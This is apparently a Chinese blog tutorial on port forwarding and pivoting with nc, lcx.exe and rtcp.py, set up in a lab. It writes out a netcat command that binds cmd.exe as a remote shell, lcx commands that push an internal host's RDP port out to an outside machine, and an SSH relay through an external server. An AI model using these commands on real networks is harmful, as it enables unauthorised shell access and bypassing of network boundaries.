一、NC反彈
NC反彈我們通常用來反彈獲取shell,其實也可以轉發端口。
測試:
本機:win7 IP:192.168.245.128
遠程主機:xp IP:192.168.245.132
在遠程主機輸入命令:nc -l -p 8888 -t -e cmd.exe
本地主機輸入命令:nc -nvv 192.168.245.132 8888
輸入命令后我們可以看的本地主機獲取了一個遠程主機的shell,查看IPipconfig,IP為遠程主機。
二、LCX.EXE
lcx.exe也是常用的端口轉發工具
測試:
本機:win10 IP:192.168.1.26
遠程主機:win7 IP:192.168.245.128
在遠程主機輸入命令:lcx.exe -slave 192.168.1.26 51 192.168.245.128 3389
#將內網主機的3389端口轉發到本地主機51端口
在本機輸入命令:lcx.exe -listen 51 3389
#將本機監聽的51端口轉發至3389端口
轉發成功后,遠程連接本機3389端口。
三、RTCP.PY
rtcp.py是一款Linux端口轉發工具,是用python實現的一款開源工具
使用場景:
假設內網服務器:A,外網服務器:B
在外網服務器B運行:rtcp.py l:10001 l:10002
#表示監聽本機10001和10002兩個端口,是兩個端口達到數據互傳
在內網服務器A運行:rtcp.py c:lhost:22 c:rhost:10001
#連接內網22端口和外網服務器的10001端口
執行命令:ssh 外網服務器IP -p 10002訪問內網服務器A的22端口。
工具不在多,在掌握即可,以上是博主比較習慣用的幾款端口轉發小工具,如果你們有更好的工具可以評論區發出來。